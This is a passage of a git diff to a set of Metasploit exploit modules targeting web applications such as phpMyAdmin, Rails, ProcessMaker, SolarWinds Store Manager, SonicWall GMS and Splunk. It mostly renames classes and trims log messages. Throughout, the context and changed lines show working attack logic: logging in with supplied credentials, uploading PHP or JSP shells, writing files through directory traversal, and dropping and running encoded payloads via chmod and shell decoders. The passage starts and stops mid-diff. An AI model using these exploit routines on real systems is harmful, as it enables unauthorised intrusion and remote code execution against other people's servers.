send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => { + 'code' => cmd + } + ) + end + +end diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 8f8a58f69d..096812613d 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a cookie, bail! if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 - vprint_status("#{peer} - Found cookie: #{cookie}") + vprint_status("Found cookie: #{cookie}") else return nil end @@ -194,49 +194,49 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] cookie = login(base, username, password) if cookie.nil? - print_error("#{peer} - Login failed with \"#{username}:#{password}\"") + print_error("Login failed with \"#{username}:#{password}\"") return end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") # Take a snapshot of the uploads directory # Viewing this doesn't actually require the user to login first, # but we supply the cookie anyway to act more like a real user. - print_status("#{peer} - Enumerating all the uploads...") + print_status("Enumerating all the uploads...") before = peek_uploads(base, cookie) if before.nil? - print_error("#{peer} - Unable to enumerate original uploads") + print_error("Unable to enumerate original uploads") return end # Upload our PHP shell - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alpha(rand(10)+6) + '.php' desc = rand_text_alpha(rand(10)+5) php = %Q|<?php #{payload.encoded} ?>| res = upload(base, cookie, fname, php, desc) if res.nil? or res.body !~ /The file was successfuly uploaded/ - print_error("#{peer} - Failed to upload our file") + print_error("Failed to upload our file") return end # Now that we've uploaded our shell, let's take another snapshot # of the uploads directory. - print_status("#{peer} - Enumerating new uploads...") + print_status("Enumerating new uploads...") after = peek_uploads(base, cookie) if after.nil? - print_error("#{peer} - Unable to enumerate latest uploads") + print_error("Unable to enumerate latest uploads") return end # Find the filename of our uploaded shell files = get_my_file(before.body, after.body) if files.empty? - print_error("#{peer} - No new file(s) found. The upload probably failed.") + print_error("No new file(s) found. The upload probably failed.") return else - vprint_status("#{peer} - Found these new files: #{files.inspect}") + vprint_status("Found these new files: #{files.inspect}") end # There might be more than 1 new file, at least execute the first 10 diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 5223279b46..2bf5e4a4ac 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index f4a13ff765..662214c355 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmoadmin_exec.rb b/modules/exploits/multi/http/phpmoadmin_exec.rb index 7c6bcd0db1..48e01b6851 100644 --- a/modules/exploits/multi/http/phpmoadmin_exec.rb +++ b/modules/exploits/multi/http/phpmoadmin_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 07e724ebec..a540ab99c6 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor - placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. + placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index f08271cfe8..c2a6c602d5 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index 1cb52422ab..567b014c8c 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 298234721b..b9d2ab419a 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 6ce71ac09d..63d2cd6da9 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = normalize_uri(uri + "/" + payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index 85ae5364aa..fddf70ee17 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 69eaf74d1e..e0ddb9bc03 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 340e9c6f02..68596ebef7 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = "#{upload_dir}#{@payload_name}" - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index e00a483e23..da859cb3f4 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send payload - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send login request - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -103,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + print_error("Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe @@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote # upload payload code = "<?php #{payload.encoded} ?>" - print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") + print_status("Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote upload # execute payload - print_status("#{peer} - Retrieving file '#{@fname}'") + print_status("Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 2b5fe040b1..ff4b154ed1 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_warning("#{peer} - Removing: #{f}") + print_warning("Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.shell_command_token("rm #{f}") end rescue ::Exception => e - print_error("#{peer} - Unable to remove #{f}: #{e.message}") + print_error("Unable to remove #{f}: #{e.message}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] # Get user data - vprint_status("#{peer} - Enumerating user data") + vprint_status("Enumerating user data") res = send_request_raw({ 'uri' => "#{base}/index.php/home/myAccount", 'cookie' => cookie @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote return {} if not res if res.code == 404 - print_error("#{peer} - #{username} does not actually have a 'myAccount' page") + print_error("#{username} does not actually have a 'myAccount' page") return {} end @@ -208,18 +208,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - Unable to request the file") + print_error("Unable to request the file") return end fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || '' if fname.empty? - print_error("#{peer} - Unable to extract the real filename") + print_error("Unable to extract the real filename") return end # Now that we have the filename, request it - print_status("#{peer} - Uploaded file was renmaed as '#{fname}'") + print_status("Uploaded file was renmaed as '#{fname}'") send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) handler end @@ -231,10 +231,10 @@ class Metasploit3 < Msf::Exploit::Remote user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with '#{user}:#{pass}'") + print_status("Attempt to login with '#{user}:#{pass}'") opts = login(base, user, pass) if opts.empty? - print_error("#{peer} - Login unsuccessful") + print_error("Login unsuccessful") return end @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload("/tmp/#{bin_name}", bin) end - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") opts = opts.merge({ 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'email' => user, @@ -260,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote }) uploader = upload_php(base, opts) if not uploader - print_error("#{peer} - Unable to upload") + print_error("Unable to upload") return end - print_status("#{peer} - Executing '#{php_fname}'") + print_status("Executing '#{php_fname}'") exec_php(base, opts) end end diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index a8da7d1553..14598f3398 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 9aa9b8e633..c2da81e843 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 29e4072bd1..c6a7904b59 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 31e262489c..50cf328ac9 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif os == 'linux' && target.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") elsif os.nil? - print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + print_warning("Failed to detect remote operating system, trying anyway...") end if target.name =~ /Windows.*VB/ @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) vbs = generate_decoder_vbs({ @@ -137,13 +137,13 @@ class Metasploit3 < Msf::Exploit::Remote :encoded_file_name => encoded_file_name, :exe_file_name => exe_file_name }) - print_status("#{peer} - Dropping the VBS decoder to filesystem...") + print_status("Dropping the VBS decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) register_files_for_cleanup("C:#{temp}#{decoder_file_name}") register_files_for_cleanup("C:#{temp}#{encoded_file_name}") register_files_for_cleanup("C:#{temp}#{exe_file_name}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") end @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) decoder = <<-SH @@ -172,17 +172,17 @@ chmod 777 #{temp}#{elf_file_name} #{temp}#{elf_file_name} SH - print_status("#{peer} - Dropping the decoder to filesystem...") + print_status("Dropping the decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) register_files_for_cleanup("#{temp}#{decoder_file_name}") register_files_for_cleanup("#{temp}#{encoded_file_name}") register_files_for_cleanup("#{temp}#{elf_file_name}") - print_status("#{peer} - Giving execution permissions to the decoder...") + print_status("Giving execution permissions to the decoder...") execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") - print_status("#{peer} - Executing decoder and payload...") + print_status("Executing decoder and payload...") execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") end @@ -191,12 +191,12 @@ SH elf = rand_text_alpha(4 + rand(4)) traversal = "/.." * traversal_depth - print_status("#{peer} - Dropping payload...") + print_status("Dropping payload...") write_file("#{traversal}#{temp}#{elf}", payload.encoded) register_files_for_cleanup("#{temp}#{elf}") - print_status("#{peer} - Providing execution permissions...") + print_status("Providing execution permissions...") execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}#{temp}#{elf}") end diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index cecbbc0ad0..e9f198bd6c 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", @@ -120,15 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" - print_status("#{peer} - Requesting '#{target_path}'...") + print_status("Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end @@ -141,11 +141,11 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index 4b23877fda..0725b0f74f 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index f854d6483b..92568c6f94 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index 077c327a73..d4de32cf5c 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 044b7584f6..4735a2872e 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") + print_status("Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") - print_warning("#{peer} - #{jsp_info} needs to be deleted manually") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") + print_warning("#{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Exploit::Remote if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else - print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") + print_warning("#{jsp_payload} needs to be deleted manually") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e35f6bf4b7..2f9e672522 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -158,13 +158,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get Tomcat installation path - print_status("#{peer} - Retrieving Tomcat installation path...") + print_status("Retrieving Tomcat installation path...") if install_path.nil? fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path") end - print_good("#{peer} - Tomcat installed on #{install_path}") + print_good("Tomcat installed on #{install_path}") if target['Platform'] == "java" exploit_java @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_java - print_status("#{peer} - Uploading WAR file") + print_status("Uploading WAR file") app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base }).to_s @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable file") + print_status("Uploading executable file") exe = payload.encoded_exe exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) if target['Platform'] == "win" diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index c23d9b5a41..c96fe4d48d 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 20066ea72b..6d574aeaaf 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 9c17ad00f3..832cef2473 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index 49b6c061b4..857c460402 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index a629668198..692c8b44b8 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -5,7 